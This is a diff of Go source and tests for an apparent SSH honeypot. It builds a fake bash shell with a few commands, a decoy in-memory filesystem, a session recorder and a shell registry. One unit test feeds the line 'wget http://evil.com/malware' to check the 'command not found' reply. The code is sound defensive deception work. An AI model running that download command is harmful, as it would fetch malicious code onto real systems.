|
||||||
|
|
||||||
|
// Check session logs were recorded.
|
||||||
|
if len(store.SessionLogs) < 2 {
|
||||||
|
t.Errorf("expected at least 2 session logs, got %d", len(store.SessionLogs))
|
||||||
|
}
|
||||||
|
}
|
||||||
|
|
||||||
|
func TestBashShellFakeUser(t *testing.T) {
|
||||||
|
store := storage.NewMemoryStore()
|
||||||
|
sessID, _ := store.CreateSession(context.Background(), "127.0.0.1", "attacker", "bash")
|
||||||
|
|
||||||
|
sess := &shell.SessionContext{
|
||||||
|
SessionID: sessID,
|
||||||
|
Username: "attacker",
|
||||||
|
Store: store,
|
||||||
|
CommonConfig: shell.ShellCommonConfig{
|
||||||
|
Hostname: "testhost",
|
||||||
|
FakeUser: "admin",
|
||||||
|
},
|
||||||
|
}
|
||||||
|
|
||||||
|
commands := "whoami\rexit\r"
|
||||||
|
clientInput := bytes.NewBufferString(commands)
|
||||||
|
var clientOutput bytes.Buffer
|
||||||
|
rw := &rwCloser{
|
||||||
|
Reader: clientInput,
|
||||||
|
Writer: &clientOutput,
|
||||||
|
}
|
||||||
|
|
||||||
|
sh := NewBashShell()
|
||||||
|
ctx, cancel := context.WithTimeout(context.Background(), 5*time.Second)
|
||||||
|
defer cancel()
|
||||||
|
|
||||||
|
sh.Handle(ctx, sess, rw)
|
||||||
|
|
||||||
|
output := clientOutput.String()
|
||||||
|
if !strings.Contains(output, "admin") {
|
||||||
|
t.Errorf("output should contain fake user 'admin', got: %s", output)
|
||||||
|
}
|
||||||
|
}
|
||||||
119
internal/shell/bash/commands.go
Normal file
119
internal/shell/bash/commands.go
Normal file
@@ -0,0 +1,119 @@
|
|||||||
|
package bash
|
||||||
|
|
||||||
|
import (
|
||||||
|
"fmt"
|
||||||
|
"runtime"
|
||||||
|
"sort"
|
||||||
|
"strings"
|
||||||
|
)
|
||||||
|
|
||||||
|
type shellState struct {
|
||||||
|
cwd string
|
||||||
|
username string
|
||||||
|
hostname string
|
||||||
|
fs *filesystem
|
||||||
|
}
|
||||||
|
|
||||||
|
type commandResult struct {
|
||||||
|
output string
|
||||||
|
exit bool
|
||||||
|
}
|
||||||
|
|
||||||
|
func dispatch(state *shellState, line string) commandResult {
|
||||||
|
fields := strings.Fields(line)
|
||||||
|
if len(fields) == 0 {
|
||||||
|
return commandResult{}
|
||||||
|
}
|
||||||
|
|
||||||
|
cmd := fields[0]
|
||||||
|
args := fields[1:]
|
||||||
|
|
||||||
|
switch cmd {
|
||||||
|
case "pwd":
|
||||||
|
return commandResult{output: state.cwd}
|
||||||
|
case "whoami":
|
||||||
|
return commandResult{output: state.username}
|
||||||
|
case "hostname":
|
||||||
|
return commandResult{output: state.hostname}
|
||||||
|
case "id":
|
||||||
|
return cmdID(state)
|
||||||
|
case "uname":
|
||||||
|
return cmdUname(state, args)
|
||||||
|
case "ls":
|
||||||
|
return cmdLs(state, args)
|
||||||
|
case "cd":
|
||||||
|
return cmdCd(state, args)
|
||||||
|
case "cat":
|
||||||
|
return cmdCat(state, args)
|
||||||
|
case "exit", "logout":
|
||||||
|
return commandResult{exit: true}
|
||||||
|
default:
|
||||||
|
return commandResult{output: fmt.Sprintf("%s: command not found", cmd)}
|
||||||
|
}
|
||||||
|
}
|
||||||
|
|
||||||
|
func cmdID(state *shellState) commandResult {
|
||||||
|
return commandResult{
|
||||||
|
output: fmt.Sprintf("uid=0(%s) gid=0(%s) groups=0(%s)", state.username, state.username, state.username),
|
||||||
|
}
|
||||||
|
}
|
||||||
|
|
||||||
|
func cmdUname(state *shellState, args []string) commandResult {
|
||||||
|
if len(args) > 0 && args[0] == "-a" {
|
||||||
|
return commandResult{
|
||||||
|
output: fmt.Sprintf("Linux %s 5.15.0-89-generic #99-Ubuntu SMP Mon Oct 30 20:42:41 UTC 2023 %s GNU/Linux", state.hostname, runtime.GOARCH),
|
||||||
|
}
|
||||||
|
}
|
||||||
|
return commandResult{output: "Linux"}
|
||||||
|
}
|
||||||
|
|
||||||
|
func cmdLs(state *shellState, args []string) commandResult {
|
||||||
|
target := state.cwd
|
||||||
|
if len(args) > 0 {
|
||||||
|
target = resolvePath(state.cwd, args[0])
|
||||||
|
}
|
||||||
|
|
||||||
|
names, err := state.fs.list(target)
|
||||||
|
if err != nil {
|
||||||
|
return commandResult{output: err.Error()}
|
||||||
|
}
|
||||||
|
|
||||||
|
sort.Strings(names)
|
||||||
|
return commandResult{output: strings.Join(names, " ")}
|
||||||
|
}
|
||||||
|
|
||||||
|
func cmdCd(state *shellState, args []string) commandResult {
|
||||||
|
target := "/root"
|
||||||
|
if len(args) > 0 {
|
||||||
|
target = resolvePath(state.cwd, args[0])
|
||||||
|
}
|
||||||
|
|
||||||
|
if !state.fs.exists(target) {
|
||||||
|
return commandResult{output: fmt.Sprintf("bash: cd: %s: No such file or directory", args[0])}
|
||||||
|
}
|
||||||
|
if !state.fs.isDirectory(target) {
|
||||||
|
return commandResult{output: fmt.Sprintf("bash: cd: %s: Not a directory", args[0])}
|
||||||
|
}
|
||||||
|
|
||||||
|
state.cwd = target
|
||||||
|
return commandResult{}
|
||||||
|
}
|
||||||
|
|
||||||
|
func cmdCat(state *shellState, args []string) commandResult {
|
||||||
|
if len(args) == 0 {
|
||||||
|
return commandResult{}
|
||||||
|
}
|
||||||
|
|
||||||
|
var parts []string
|
||||||
|
for _, arg := range args {
|
||||||
|
p := resolvePath(state.cwd, arg)
|
||||||
|
content, err := state.fs.read(p)
|
||||||
|
if err != nil {
|
||||||
|
parts = append(parts, err.Error())
|
||||||
|
} else {
|
||||||
|
parts = append(parts, strings.TrimRight(content, "\n"))
|
||||||
|
}
|
||||||
|
}
|
||||||
|
|
||||||
|
return commandResult{output: strings.Join(parts, "\n")}
|
||||||
|
}
|
||||||
201
internal/shell/bash/commands_test.go
Normal file
201
internal/shell/bash/commands_test.go
Normal file
@@ -0,0 +1,201 @@
|
|||||||
|
package bash
|
||||||
|
|
||||||
|
import (
|
||||||
|
"strings"
|
||||||
|
"testing"
|
||||||
|
)
|
||||||
|
|
||||||
|
func newTestState() *shellState {
|
||||||
|
fs := newFilesystem("testhost")
|
||||||
|
return &shellState{
|
||||||
|
cwd: "/root",
|
||||||
|
username: "root",
|
||||||
|
hostname: "testhost",
|
||||||
|
fs: fs,
|
||||||
|
}
|
||||||
|
}
|
||||||
|
|
||||||
|
func TestCmdPwd(t *testing.T) {
|
||||||
|
state := newTestState()
|
||||||
|
r := dispatch(state, "pwd")
|
||||||
|
if r.output != "/root" {
|
||||||
|
t.Errorf("pwd = %q, want %q", r.output, "/root")
|
||||||
|
}
|
||||||
|
}
|
||||||
|
|
||||||
|
func TestCmdWhoami(t *testing.T) {
|
||||||
|
state := newTestState()
|
||||||
|
r := dispatch(state, "whoami")
|
||||||
|
if r.output != "root" {
|
||||||
|
t.Errorf("whoami = %q, want %q", r.output, "root")
|
||||||
|
}
|
||||||
|
}
|
||||||
|
|
||||||
|
func TestCmdHostname(t *testing.T) {
|
||||||
|
state := newTestState()
|
||||||
|
r := dispatch(state, "hostname")
|
||||||
|
if r.output != "testhost" {
|
||||||
|
t.Errorf("hostname = %q, want %q", r.output, "testhost")
|
||||||
|
}
|
||||||
|
}
|
||||||
|
|
||||||
|
func TestCmdId(t *testing.T) {
|
||||||
|
state := newTestState()
|
||||||
|
r := dispatch(state, "id")
|
||||||
|
if !strings.Contains(r.output, "uid=0(root)") {
|
||||||
|
t.Errorf("id output = %q, want uid=0(root)", r.output)
|
||||||
|
}
|
||||||
|
}
|
||||||
|
|
||||||
|
func TestCmdUnameBasic(t *testing.T) {
|
||||||
|
state := newTestState()
|
||||||
|
r := dispatch(state, "uname")
|
||||||
|
if r.output != "Linux" {
|
||||||
|
t.Errorf("uname = %q, want %q", r.output, "Linux")
|
||||||
|
}
|
||||||
|
}
|
||||||
|
|
||||||
|
func TestCmdUnameAll(t *testing.T) {
|
||||||
|
state := newTestState()
|
||||||
|
r := dispatch(state, "uname -a")
|
||||||
|
if !strings.HasPrefix(r.output, "Linux testhost") {
|
||||||
|
t.Errorf("uname -a = %q, want prefix 'Linux testhost'", r.output)
|
||||||
|
}
|
||||||
|
}
|
||||||
|
|
||||||
|
func TestCmdLs(t *testing.T) {
|
||||||
|
state := newTestState()
|
||||||
|
r := dispatch(state, "ls")
|
||||||
|
if r.output == "" {
|
||||||
|
t.Error("ls should return non-empty output")
|
||||||
|
}
|
||||||
|
}
|
||||||
|
|
||||||
|
func TestCmdLsPath(t *testing.T) {
|
||||||
|
state := newTestState()
|
||||||
|
r := dispatch(state, "ls /etc")
|
||||||
|
if !strings.Contains(r.output, "passwd") {
|
||||||
|
t.Errorf("ls /etc = %q, should contain 'passwd'", r.output)
|
||||||
|
}
|
||||||
|
}
|
||||||
|
|
||||||
|
func TestCmdLsNonexistent(t *testing.T) {
|
||||||
|
state := newTestState()
|
||||||
|
r := dispatch(state, "ls /nope")
|
||||||
|
if !strings.Contains(r.output, "No such file") {
|
||||||
|
t.Errorf("ls /nope = %q, should contain 'No such file'", r.output)
|
||||||
|
}
|
||||||
|
}
|
||||||
|
|
||||||
|
func TestCmdCd(t *testing.T) {
|
||||||
|
state := newTestState()
|
||||||
|
r := dispatch(state, "cd /tmp")
|
||||||
|
if r.output != "" {
|
||||||
|
t.Errorf("cd /tmp should produce no output, got %q", r.output)
|
||||||
|
}
|
||||||
|
if state.cwd != "/tmp" {
|
||||||
|
t.Errorf("cwd = %q, want %q", state.cwd, "/tmp")
|
||||||
|
}
|
||||||
|
}
|
||||||
|
|
||||||
|
func TestCmdCdNonexistent(t *testing.T) {
|
||||||
|
state := newTestState()
|
||||||
|
r := dispatch(state, "cd /nope")
|
||||||
|
if !strings.Contains(r.output, "No such file") {
|
||||||
|
t.Errorf("cd /nope = %q, should contain 'No such file'", r.output)
|
||||||
|
}
|
||||||
|
}
|
||||||
|
|
||||||
|
func TestCmdCdNoArgs(t *testing.T) {
|
||||||
|
state := newTestState()
|
||||||
|
state.cwd = "/tmp"
|
||||||
|
dispatch(state, "cd")
|
||||||
|
if state.cwd != "/root" {
|
||||||
|
t.Errorf("cd with no args should go to /root, got %q", state.cwd)
|
||||||
|
}
|
||||||
|
}
|
||||||
|
|
||||||
|
func TestCmdCdRelative(t *testing.T) {
|
||||||
|
state := newTestState()
|
||||||
|
state.cwd = "/var"
|
||||||
|
dispatch(state, "cd log")
|
||||||
|
if state.cwd != "/var/log" {
|
||||||
|
t.Errorf("cwd = %q, want %q", state.cwd, "/var/log")
|
||||||
|
}
|
||||||
|
}
|
||||||
|
|
||||||
|
func TestCmdCdDotDot(t *testing.T) {
|
||||||
|
state := newTestState()
|
||||||
|
state.cwd = "/var/log"
|
||||||
|
dispatch(state, "cd ..")
|
||||||
|
if state.cwd != "/var" {
|
||||||
|
t.Errorf("cwd = %q, want %q", state.cwd, "/var")
|
||||||
|
}
|
||||||
|
}
|
||||||
|
|
||||||
|
func TestCmdCat(t *testing.T) {
|
||||||
|
state := newTestState()
|
||||||
|
r := dispatch(state, "cat /etc/hostname")
|
||||||
|
if !strings.Contains(r.output, "testhost") {
|
||||||
|
t.Errorf("cat /etc/hostname = %q, should contain 'testhost'", r.output)
|
||||||
|
}
|
||||||
|
}
|
||||||
|
|
||||||
|
func TestCmdCatNonexistent(t *testing.T) {
|
||||||
|
state := newTestState()
|
||||||
|
r := dispatch(state, "cat /nope")
|
||||||
|
if !strings.Contains(r.output, "No such file") {
|
||||||
|
t.Errorf("cat /nope = %q, should contain 'No such file'", r.output)
|
||||||
|
}
|
||||||
|
}
|
||||||
|
|
||||||
|
func TestCmdCatDirectory(t *testing.T) {
|
||||||
|
state := newTestState()
|
||||||
|
r := dispatch(state, "cat /etc")
|
||||||
|
if !strings.Contains(r.output, "Is a directory") {
|
||||||
|
t.Errorf("cat /etc = %q, should contain 'Is a directory'", r.output)
|
||||||
|
}
|
||||||
|
}
|
||||||
|
|
||||||
|
func TestCmdCatMultiple(t *testing.T) {
|
||||||
|
state := newTestState()
|
||||||
|
r := dispatch(state, "cat /etc/hostname /root/README.txt")
|
||||||
|
if !strings.Contains(r.output, "testhost") || !strings.Contains(r.output, "DO NOT MODIFY") {
|
||||||
|
t.Errorf("cat multiple files = %q, should contain both file contents", r.output)
|
||||||
|
}
|
||||||
|
}
|
||||||
|
|
||||||
|
func TestCmdExit(t *testing.T) {
|
||||||
|
state := newTestState()
|
||||||
|
r := dispatch(state, "exit")
|
||||||
|
if !r.exit {
|
||||||
|
t.Error("exit should set exit=true")
|
||||||
|
}
|
||||||
|
}
|
||||||
|
|
||||||
|
func TestCmdLogout(t *testing.T) {
|
||||||
|
state := newTestState()
|
||||||
|
r := dispatch(state, "logout")
|
||||||
|
if !r.exit {
|
||||||
|
t.Error("logout should set exit=true")
|
||||||
|
}
|
||||||
|
}
|
||||||
|
|
||||||
|
func TestCmdNotFound(t *testing.T) {
|
||||||
|
state := newTestState()
|
||||||
|
r := dispatch(state, "wget http://evil.com/malware")
|
||||||
|
if !strings.Contains(r.output, "command not found") {
|
||||||
|
t.Errorf("unknown cmd = %q, should contain 'command not found'", r.output)
|
||||||
|
}
|
||||||
|
if !strings.HasPrefix(r.output, "wget:") {
|
||||||
|
t.Errorf("unknown cmd = %q, should start with 'wget:'", r.output)
|
||||||
|
}
|
||||||
|
}
|
||||||
|
|
||||||
|
func TestCmdEmptyLine(t *testing.T) {
|
||||||
|
state := newTestState()
|
||||||
|
r := dispatch(state, "")
|
||||||
|
if r.output != "" || r.exit {
|
||||||
|
t.Errorf("empty line should produce no output and not exit")
|
||||||
|
}
|
||||||
|
}
|
||||||
166
internal/shell/bash/filesystem.go
Normal file
166
internal/shell/bash/filesystem.go
Normal file
@@ -0,0 +1,166 @@
|
|||||||
|
package bash
|
||||||
|
|
||||||
|
import (
|
||||||
|
"fmt"
|
||||||
|
"path"
|
||||||
|
"strings"
|
||||||
|
)
|
||||||
|
|
||||||
|
type fsNode struct {
|
||||||
|
name string
|
||||||
|
isDir bool
|
||||||
|
content string
|
||||||
|
children map[string]*fsNode
|
||||||
|
}
|
||||||
|
|
||||||
|
type filesystem struct {
|
||||||
|
root *fsNode
|
||||||
|
}
|
||||||
|
|
||||||
|
func newFilesystem(hostname string) *filesystem {
|
||||||
|
fs := &filesystem{
|
||||||
|
root: &fsNode{name: "/", isDir: true, children: make(map[string]*fsNode)},
|
||||||
|
}
|
||||||
|
|
||||||
|
fs.mkdirAll("/etc")
|
||||||
|
fs.mkdirAll("/root")
|
||||||
|
fs.mkdirAll("/home")
|
||||||
|
fs.mkdirAll("/var/log")
|
||||||
|
fs.mkdirAll("/tmp")
|
||||||
|
fs.mkdirAll("/usr/bin")
|
||||||
|
fs.mkdirAll("/usr/local")
|
||||||
|
|
||||||
|
fs.writeFile("/etc/passwd", "root:x:0:0:root:/root:/bin/bash\n"+
|
||||||
|
"daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin\n"+
|
||||||
|
"www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin\n"+
|
||||||
|
"mysql:x:27:27:MySQL Server:/var/lib/mysql:/bin/false\n")
|
||||||
|
|
||||||
|
fs.writeFile("/etc/hostname", hostname+"\n")
|
||||||
|
|
||||||
|
fs.writeFile("/etc/hosts", "127.0.0.1\tlocalhost\n"+
|
||||||
|
"127.0.1.1\t"+hostname+"\n"+
|
||||||
|
"::1\t\tlocalhost ip6-localhost ip6-loopback\n")
|
||||||
|
|
||||||
|
fs.writeFile("/root/.bash_history",
|
||||||
|
"apt update\n"+
|
||||||
|
"apt upgrade -y\n"+
|
||||||
|
"systemctl restart nginx\n"+
|
||||||
|
"tail -f /var/log/syslog\n"+
|
||||||
|
"df -h\n"+
|
||||||
|
"free -m\n"+
|
||||||
|
"netstat -tlnp\n"+
|
||||||
|
"cat /etc/passwd\n")
|
||||||
|
|
||||||
|
fs.writeFile("/root/.bashrc",
|
||||||
|
"# ~/.bashrc: executed by bash(1) for non-login shells.\n"+
|
||||||
|
"export PS1='\\u@\\h:\\w\\$ '\n"+
|
||||||
|
"alias ll='ls -alF'\n"+
|
||||||
|
"alias la='ls -A'\n")
|
||||||
|
|
||||||
|
fs.writeFile("/root/README.txt", "Production server - DO NOT MODIFY\n")
|
||||||
|
|
||||||
|
fs.writeFile("/var/log/syslog",
|
||||||
|
"Jan 12 03:14:22 "+hostname+" systemd[1]: Started Daily apt download activities.\n"+
|
||||||
|
"Jan 12 03:14:23 "+hostname+" systemd[1]: Started Daily Cleanup of Temporary Directories.\n"+
|
||||||
|
"Jan 12 04:00:01 "+hostname+" CRON[12345]: (root) CMD (/usr/local/bin/backup.sh)\n"+
|
||||||
|
"Jan 12 04:00:03 "+hostname+" kernel: [UFW BLOCK] IN=eth0 OUT= SRC=203.0.113.42 DST=10.0.0.5 PROTO=TCP DPT=22\n")
|
||||||
|
|
||||||
|
fs.writeFile("/tmp/notes.txt", "TODO: Update SSL certificates\n")
|
||||||
|
|
||||||
|
return fs
|
||||||
|
}
|
||||||
|
|
||||||
|
// resolvePath converts a potentially relative path to an absolute one.
|
||||||
|
func resolvePath(cwd, p string) string {
|
||||||
|
if !strings.HasPrefix(p, "/") {
|
||||||
|
p = cwd + "/" + p
|
||||||
|
}
|
||||||
|
return path.Clean(p)
|
||||||
|
}
|
||||||
|
|
||||||
|
func (fs *filesystem) lookup(p string) *fsNode {
|
||||||
|
p = path.Clean(p)
|
||||||
|
if p == "/" {
|
||||||
|
return fs.root
|
||||||
|
}
|
||||||
|
|
||||||
|
parts := strings.Split(strings.TrimPrefix(p, "/"), "/")
|
||||||
|
node := fs.root
|
||||||
|
for _, part := range parts {
|
||||||
|
if node.children == nil {
|
||||||
|
return nil
|
||||||
|
}
|
||||||
|
child, ok := node.children[part]
|
||||||
|
if !ok {
|
||||||
|
return nil
|
||||||
|
}
|
||||||
|
node = child
|
||||||
|
}
|
||||||
|
return node
|
||||||
|
}
|
||||||
|
|
||||||
|
func (fs *filesystem) exists(p string) bool {
|
||||||
|
return fs.lookup(p) != nil
|
||||||
|
}
|
||||||
|
|
||||||
|
func (fs *filesystem) isDirectory(p string) bool {
|
||||||
|
n := fs.lookup(p)
|
||||||
|
return n != nil && n.isDir
|
||||||
|
}
|
||||||
|
|
||||||
|
func (fs *filesystem) list(p string) ([]string, error) {
|
||||||
|
n := fs.lookup(p)
|
||||||
|
if n == nil {
|
||||||
|
return nil, fmt.Errorf("ls: cannot access '%s': No such file or directory", p)
|
||||||
|
}
|
||||||
|
if !n.isDir {
|
||||||
|
return nil, fmt.Errorf("ls: cannot access '%s': Not a directory", p)
|
||||||
|
}
|
||||||
|
|
||||||
|
names := make([]string, 0, len(n.children))
|
||||||
|
for name, child := range n.children {
|
||||||
|
if child.isDir {
|
||||||
|
name += "/"
|
||||||
|
}
|
||||||
|
names = append(names, name)
|
||||||
|
}
|
||||||
|
return names, nil
|
||||||
|
}
|
||||||
|
|
||||||
|
func (fs *filesystem) read(p string) (string, error) {
|
||||||
|
n := fs.lookup(p)
|
||||||
|
if n == nil {
|
||||||
|
return "", fmt.Errorf("cat: %s: No such file or directory", p)
|
||||||
|
}
|
||||||
|
if n.isDir {
|
||||||
|
return "", fmt.Errorf("cat: %s: Is a directory", p)
|
||||||
|
}
|
||||||
|
return n.content, nil
|
||||||
|
}
|
||||||
|
|
||||||
|
func (fs *filesystem) mkdirAll(p string) {
|
||||||
|
p = path.Clean(p)
|
||||||
|
parts := strings.Split(strings.TrimPrefix(p, "/"), "/")
|
||||||
|
node := fs.root
|
||||||
|
for _, part := range parts {
|
||||||
|
if node.children == nil {
|
||||||
|
node.children = make(map[string]*fsNode)
|
||||||
|
}
|
||||||
|
child, ok := node.children[part]
|
||||||
|
if !ok {
|
||||||
|
child = &fsNode{name: part, isDir: true, children: make(map[string]*fsNode)}
|
||||||
|
node.children[part] = child
|
||||||
|
}
|
||||||
|
node = child
|
||||||
|
}
|
||||||
|
}
|
||||||
|
|
||||||
|
func (fs *filesystem) writeFile(p string, content string) {
|
||||||
|
p = path.Clean(p)
|
||||||
|
dir := path.Dir(p)
|
||||||
|
base := path.Base(p)
|
||||||
|
|
||||||
|
fs.mkdirAll(dir)
|
||||||
|
parent := fs.lookup(dir)
|
||||||
|
parent.children[base] = &fsNode{name: base, content: content}
|
||||||
|
}
|
||||||
140
internal/shell/bash/filesystem_test.go
Normal file
140
internal/shell/bash/filesystem_test.go
Normal file
@@ -0,0 +1,140 @@
|
|||||||
|
package bash
|
||||||
|
|
||||||
|
import (
|
||||||
|
"sort"
|
||||||
|
"testing"
|
||||||
|
)
|
||||||
|
|
||||||
|
func TestNewFilesystem(t *testing.T) {
|
||||||
|
fs := newFilesystem("testhost")
|
||||||
|
|
||||||
|
// Standard directories should exist.
|
||||||
|
for _, dir := range []string{"/etc", "/root", "/home", "/var/log", "/tmp", "/usr/bin"} {
|
||||||
|
if !fs.isDirectory(dir) {
|
||||||
|
t.Errorf("%s should be a directory", dir)
|
||||||
|
}
|
||||||
|
}
|
||||||
|
|
||||||
|
// Standard files should exist.
|
||||||
|
for _, file := range []string{"/etc/passwd", "/etc/hostname", "/root/.bashrc", "/tmp/notes.txt"} {
|
||||||
|
if !fs.exists(file) {
|
||||||
|
t.Errorf("%s should exist", file)
|
||||||
|
}
|
||||||
|
}
|
||||||
|
}
|
||||||
|
|
||||||
|
func TestFilesystemHostname(t *testing.T) {
|
||||||
|
fs := newFilesystem("myhost")
|
||||||
|
content, err := fs.read("/etc/hostname")
|
||||||
|
if err != nil {
|
||||||
|
t.Fatalf("read /etc/hostname: %v", err)
|
||||||
|
}
|
||||||
|
if content != "myhost\n" {
|
||||||
|
t.Errorf("hostname content = %q, want %q", content, "myhost\n")
|
||||||
|
}
|
||||||
|
}
|
||||||
|
|
||||||
|
func TestResolvePath(t *testing.T) {
|
||||||
|
tests := []struct {
|
||||||
|
cwd string
|
||||||
|
arg string
|
||||||
|
want string
|
||||||
|
}{
|
||||||
|
{"/root", "file.txt", "/root/file.txt"},
|
||||||
|
{"/root", "/etc/passwd", "/etc/passwd"},
|
||||||
|
{"/root", "..", "/"},
|
||||||
|
{"/var/log", "../..", "/"},
|
||||||
|
{"/root", ".", "/root"},
|
||||||
|
{"/root", "./sub/file", "/root/sub/file"},
|
||||||
|
{"/", "etc", "/etc"},
|
||||||
|
}
|
||||||
|
for _, tt := range tests {
|
||||||
|
got := resolvePath(tt.cwd, tt.arg)
|
||||||
|
if got != tt.want {
|
||||||
|
t.Errorf("resolvePath(%q, %q) = %q, want %q", tt.cwd, tt.arg, got, tt.want)
|
||||||
|
}
|
||||||
|
}
|
||||||
|
}
|
||||||
|
|
||||||
|
func TestFilesystemList(t *testing.T) {
|
||||||
|
fs := newFilesystem("testhost")
|
||||||
|
|
||||||
|
names, err := fs.list("/etc")
|
||||||
|
if err != nil {
|
||||||
|
t.Fatalf("list /etc: %v", err)
|
||||||
|
}
|
||||||
|
sort.Strings(names)
|
||||||
|
|
||||||
|
// Should contain at least passwd, hostname, hosts.
|
||||||
|
found := map[string]bool{}
|
||||||
|
for _, n := range names {
|
||||||
|
found[n] = true
|
||||||
|
}
|
||||||
|
for _, want := range []string{"passwd", "hostname", "hosts"} {
|
||||||
|
if !found[want] {
|
||||||
|
t.Errorf("list /etc missing %q, got %v", want, names)
|
||||||
|
}
|
||||||
|
}
|
||||||
|
}
|
||||||
|
|
||||||
|
func TestFilesystemListNonexistent(t *testing.T) {
|
||||||
|
fs := newFilesystem("testhost")
|
||||||
|
_, err := fs.list("/nonexistent")
|
||||||
|
if err == nil {
|
||||||
|
t.Fatal("expected error listing nonexistent directory")
|
||||||
|
}
|
||||||
|
}
|
||||||
|
|
||||||
|
func TestFilesystemListFile(t *testing.T) {
|
||||||
|
fs := newFilesystem("testhost")
|
||||||
|
_, err := fs.list("/etc/passwd")
|
||||||
|
if err == nil {
|
||||||
|
t.Fatal("expected error listing a file")
|
||||||
|
}
|
||||||
|
}
|
||||||
|
|
||||||
|
func TestFilesystemRead(t *testing.T) {
|
||||||
|
fs := newFilesystem("testhost")
|
||||||
|
content, err := fs.read("/etc/passwd")
|
||||||
|
if err != nil {
|
||||||
|
t.Fatalf("read: %v", err)
|
||||||
|
}
|
||||||
|
if content == "" {
|
||||||
|
t.Error("expected non-empty content")
|
||||||
|
}
|
||||||
|
}
|
||||||
|
|
||||||
|
func TestFilesystemReadNonexistent(t *testing.T) {
|
||||||
|
fs := newFilesystem("testhost")
|
||||||
|
_, err := fs.read("/no/such/file")
|
||||||
|
if err == nil {
|
||||||
|
t.Fatal("expected error for nonexistent file")
|
||||||
|
}
|
||||||
|
}
|
||||||
|
|
||||||
|
func TestFilesystemReadDirectory(t *testing.T) {
|
||||||
|
fs := newFilesystem("testhost")
|
||||||
|
_, err := fs.read("/etc")
|
||||||
|
if err == nil {
|
||||||
|
t.Fatal("expected error for reading a directory")
|
||||||
|
}
|
||||||
|
}
|
||||||
|
|
||||||
|
func TestFilesystemDirectoryListing(t *testing.T) {
|
||||||
|
fs := newFilesystem("testhost")
|
||||||
|
names, err := fs.list("/")
|
||||||
|
if err != nil {
|
||||||
|
t.Fatalf("list /: %v", err)
|
||||||
|
}
|
||||||
|
|
||||||
|
// Root directories should end with /
|
||||||
|
found := map[string]bool{}
|
||||||
|
for _, n := range names {
|
||||||
|
found[n] = true
|
||||||
|
}
|
||||||
|
for _, want := range []string{"etc/", "root/", "home/", "var/", "tmp/", "usr/"} {
|
||||||
|
if !found[want] {
|
||||||
|
t.Errorf("list / missing %q, got %v", want, names)
|
||||||
|
}
|
||||||
|
}
|
||||||
|
}
|
||||||
19
internal/shell/recorder.go
Normal file
19
internal/shell/recorder.go
Normal file
@@ -0,0 +1,19 @@
|
|||||||
|
package shell
|
||||||
|
|
||||||
|
import "io"
|
||||||
|
|
||||||
|
// RecordingChannel wraps an io.ReadWriteCloser. In Phase 1.4 it is a
|
||||||
|
// pass-through; Phase 2.3 will add byte-level keystroke recording here
|
||||||
|
// without changing any shell code.
|
||||||
|
type RecordingChannel struct {
|
||||||
|
inner io.ReadWriteCloser
|
||||||
|
}
|
||||||
|
|
||||||
|
// NewRecordingChannel returns a RecordingChannel wrapping rw.
|
||||||
|
func NewRecordingChannel(rw io.ReadWriteCloser) *RecordingChannel {
|
||||||
|
return &RecordingChannel{inner: rw}
|
||||||
|
}
|
||||||
|
|
||||||
|
func (r *RecordingChannel) Read(p []byte) (int, error) { return r.inner.Read(p) }
|
||||||
|
func (r *RecordingChannel) Write(p []byte) (int, error) { return r.inner.Write(p) }
|
||||||
|
func (r *RecordingChannel) Close() error { return r.inner.Close() }
|
||||||
43
internal/shell/recorder_test.go
Normal file
43
internal/shell/recorder_test.go
Normal file
@@ -0,0 +1,43 @@
|
|||||||
|
package shell
|
||||||
|
|
||||||
|
import (
|
||||||
|
"bytes"
|
||||||
|
"io"
|
||||||
|
"testing"
|
||||||
|
)
|
||||||
|
|
||||||
|
// nopCloser wraps a ReadWriter with a no-op Close.
|
||||||
|
type nopCloser struct {
|
||||||
|
io.ReadWriter
|
||||||
|
}
|
||||||
|
|
||||||
|
func (nopCloser) Close() error { return nil }
|
||||||
|
|
||||||
|
func TestRecordingChannelPassthrough(t *testing.T) {
|
||||||
|
var buf bytes.Buffer
|
||||||
|
rc := NewRecordingChannel(nopCloser{&buf})
|
||||||
|
|
||||||
|
// Write through the recorder.
|
||||||
|
msg := []byte("hello")
|
||||||
|
n, err := rc.Write(msg)
|
||||||
|
if err != nil {
|
||||||
|
t.Fatalf("Write: %v", err)
|
||||||
|
}
|
||||||
|
if n != len(msg) {
|
||||||
|
t.Errorf("Write n = %d, want %d", n, len(msg))
|
||||||
|
}
|
||||||
|
|
||||||
|
// Read through the recorder.
|
||||||
|
out := make([]byte, 16)
|
||||||
|
n, err = rc.Read(out)
|
||||||
|
if err != nil {
|
||||||
|
t.Fatalf("Read: %v", err)
|
||||||
|
}
|
||||||
|
if string(out[:n]) != "hello" {
|
||||||
|
t.Errorf("Read = %q, want %q", out[:n], "hello")
|
||||||
|
}
|
||||||
|
|
||||||
|
if err := rc.Close(); err != nil {
|
||||||
|
t.Fatalf("Close: %v", err)
|
||||||
|
}
|
||||||
|
}
|
||||||
84
internal/shell/registry.go
Normal file
84
internal/shell/registry.go
Normal file
@@ -0,0 +1,84 @@
|
|||||||
|
package shell
|
||||||
|
|
||||||
|
import (
|
||||||
|
"errors"
|
||||||
|
"fmt"
|
||||||
|
"math/rand/v2"
|
||||||
|
"sync"
|
||||||
|
)
|
||||||
|
|
||||||
|
type registryEntry struct {
|
||||||
|
shell Shell
|
||||||
|
weight int
|
||||||
|
}
|
||||||
|
|
||||||
|
// Registry holds shells with associated weights for random selection.
|
||||||
|
type Registry struct {
|
||||||
|
mu sync.RWMutex
|
||||||
|
entries []registryEntry
|
||||||
|
}
|
||||||
|
|
||||||
|
// NewRegistry returns an empty Registry.
|
||||||
|
func NewRegistry() *Registry {
|
||||||
|
return &Registry{}
|
||||||
|
}
|
||||||
|
|
||||||
|
// Register adds a shell with the given weight. Weight must be >= 1 and
|
||||||
|
// no duplicate names are allowed.
|
||||||
|
func (r *Registry) Register(shell Shell, weight int) error {
|
||||||
|
if weight < 1 {
|
||||||
|
return fmt.Errorf("weight must be >= 1, got %d", weight)
|
||||||
|
}
|
||||||
|
|
||||||
|
r.mu.Lock()
|
||||||
|
defer r.mu.Unlock()
|
||||||
|
|
||||||
|
for _, e := range r.entries {
|
||||||
|
if e.shell.Name() == shell.Name() {
|
||||||
|
return fmt.Errorf("shell %q already registered", shell.Name())
|
||||||
|
}
|
||||||
|
}
|
||||||
|
|
||||||
|
r.entries = append(r.entries, registryEntry{shell: shell, weight: weight})
|
||||||
|
return nil
|
||||||
|
}
|
||||||
